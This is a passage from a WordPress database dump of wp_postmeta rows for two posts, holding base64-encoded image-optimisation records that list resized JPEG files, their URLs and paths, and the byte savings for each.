OVwvTVMtMTQzQVgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xNDNBWC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTE0M0FYLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo3NDUsInRpbWUiOjE0ODM1NjU4NDcsImlkIjoxNzM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTQzQVgtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTQzQVgtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTE0M0FYLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzY1LCJ0aW1lIjoxNDgzNTY1ODUwLCJpZCI6MTczN31d'); 
INSERT INTO `wp_postmeta` VALUES (29282, 1736, 'wpfc_optimisation_reduction', '26158'); 
INSERT INTO `wp_postmeta` VALUES (29283, 1736, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY1ODU0LCJpZCI6IjE3MzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlhELTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJYRC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODg5LCJ0aW1lIjoxNDgzNTY1ODU4LCJpZCI6MTczNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlhELTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyWEQtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMwMjQsInRpbWUiOjE0ODM1NjU4NjEsImlkIjoxNzM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlhELTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJYRC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjY4NiwidGltZSI6MTQ4MzU2NTg2NSwiaWQiOjE3MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEyOTgzLCJ0aW1lIjoxNDgzNTY1ODY5LCJpZCI6MTczNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlhELTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyWEQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYwNiwidGltZSI6MTQ4MzU2NTg3MiwiaWQiOjE3MzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MDcsInRpbWUiOjE0ODM1NjU4NzUsImlkIjoxNzM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlhELTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJYRC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTkxLCJ0aW1lIjoxNDgzNTY1ODc4LCJpZCI6MTczNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlhELTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyWEQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE4NTksInRpbWUiOjE0ODM1NjU4ODIsImlkIjoxNzM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MjAsInRpbWUiOjE0ODM1NjU4ODUsImlkIjoxNzM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MTMsInRpbWUiOjE0ODM1NjU4ODksImlkIjoxNzM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NTUsInRpbWUiOjE0ODM1NjU4OTIsImlkIjoxNzM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJYRC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo5NDEsInRpbWUiOjE0ODM1NjU4OTUsImlkIjoxNzM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyWEQtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlhELTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzg0LCJ0aW1lIjoxNDgzNTY1ODk5LCJpZCI6MTczNn1d'); 
INSERT INTO `wp_postmeta` VALUES (29284, 1735, 'wpfc_optimisation_reduction', '26980'); 
INSERT INTO `wp_postmeta` VALUES (29285, 1735, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY1OTAzLCJpZCI6IjE3MzUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJTRS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTM3LCJ0aW1lIjoxNDgzNTY1OTA3LCJpZCI6MTczNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyU0UtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMxNzYsInRpbWUiOjE0ODM1NjU5MTAsImlkIjoxNzM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJTRS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Mjg1NCwidGltZSI6MTQ4MzU2NTkxMywiaWQiOjE3MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlNFLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzMTY1LCJ0aW1lIjoxNDgzNTY1OTE3LCJpZCI6MTczNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyU0UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0NywidGltZSI6MTQ4MzU2NTkyMSwiaWQiOjE3MzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlNFLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTgsInRpbWUiOjE0ODM1NjU5MjQsImlkIjoxNzM1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9NUy0xMjJTRS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjEzLCJ0aW1lIjoxNDgzNTY1OTI4LCJpZCI6MTczNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL01TLTEyMlNFLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvTVMtMTIyU0UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5MTMsInRpbWUiOjE0ODM1NjU5MzEsImlkIjoxNzM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlNFLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MzMsInRpbWUiOjE0ODM1NjU5MzUsImlkIjoxNzM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlNFLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MjQsInRpbWUiOjE0ODM1NjU5MzgsImlkIjoxNzM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlNFLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NzksInRpbWUiOjE0ODM1NjU5NDQsImlkIjoxNzM1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvTVMtMTIyU0UtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9NUy0xMjJTRS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL01TLTEyMlNFLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDM5LCJ0aW1lIjoxNDgzNTY1OTQ3LCJpZCI6MTczNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvd